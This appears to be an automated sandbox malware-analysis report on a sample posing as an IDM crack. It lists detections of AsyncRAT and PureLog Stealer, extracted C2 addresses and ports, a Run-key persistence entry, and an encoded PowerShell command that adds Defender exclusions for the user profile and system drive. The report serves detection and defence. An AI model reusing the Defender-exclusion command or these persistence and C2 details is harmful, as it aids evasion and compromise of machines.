3.2.Hzoynygqzv.exe.5570000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Hzoynygqzv.exe.5570000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KMj8h32vWy.exe", ParentImage: C:\Users\user\Desktop\KMj8h32vWy.exe, ParentProcessId: 7280, ParentProcessName: KMj8h32vWy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", ProcessId: 7328, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Hzoynygqzv.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ouopxupnarf

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KMj8h32vWy.exe", ParentImage: C:\Users\user\Desktop\KMj8h32vWy.exe, ParentProcessId: 7280, ParentProcessName: KMj8h32vWy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", ProcessId: 7328, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KMj8h32vWy.exe", ParentImage: C:\Users\user\Desktop\KMj8h32vWy.exe, ParentProcessId: 7280, ParentProcessName: KMj8h32vWy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=", ProcessId: 7328, ProcessName: powershell.exe

Snort Signatures

ET TROJAN Generic AsyncRAT Style SSL Cert - Source IP: 91.92.253.249 - Destination IP: 192.168.2.4

Timestamp:	04/25/24-08:27:00.366151
SID:	2035595
Source Port:	6606
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) - Source IP: 91.92.253.249 - Destination IP: 192.168.2.4

Timestamp:	04/25/24-08:27:00.366151
SID:	2030673
Source Port:	6606
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "tomx.brasilia.me,91.92.253.249", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "vWKJAJDsDf09", "Autorun": "false", "Group": "null"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Virustotal: Detection: 63%	Perma Link
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Virustotal: Detection: 70%	Perma Link
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Virustotal: Detection: 63%	Perma Link

Multi AV Scanner detection for submitted file

Source: KMj8h32vWy.exe	ReversingLabs: Detection: 71%
Source: KMj8h32vWy.exe	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: KMj8h32vWy.exe

Joe Sandbox ML: detected

Source: KMj8h32vWy.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1658008989.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000042A3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.000000000422B000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1658008989.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000042A3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.000000000422B000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 4x nop then jmp 05429503h	3_2_05429318
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_0542FB28
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 4x nop then jmp 05429503h	3_2_05429309
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	3_2_0542FB23

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 91.92.253.249:6606 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 91.92.253.249:6606 -> 192.168.2.4:49730

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: tomx.brasilia.me

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 91.92.253.249:6606

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: tomx.brasilia.me

Source: InstallUtil.exe, 00000005.00000002.2892516704.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2892516704.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: InstallUtil.exe, 00000005.00000002.2890976907.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
Source: IDM_6.4x_Crack_v18.1.exe.0.dr	String found in binary or memory: http://koti.mbnet.fi/vaultec/
Source: powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1658568749.0000000004981000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	String found in binary or memory: http://www.softpedia.com/get/PORTABLE-SOFTWARE/Security/Password-Managers---Generators/IDM-Password-
Source: KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	String found in binary or memory: http://www.softpedia.com/get/PORTABLE-SOFTWARE/System/Backup-and-Recovery/Portable-IDM-Backup-Manage
Source: powershell.exe, 00000001.00000002.1658568749.0000000004981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	String found in binary or memory: https://www.internetdownloadmanager.com/register/new_faq/functions7.html
Source: KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	String found in binary or memory: https://www.internetdownloadmanager.com/register/new_faq/functions7.htmlApply

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
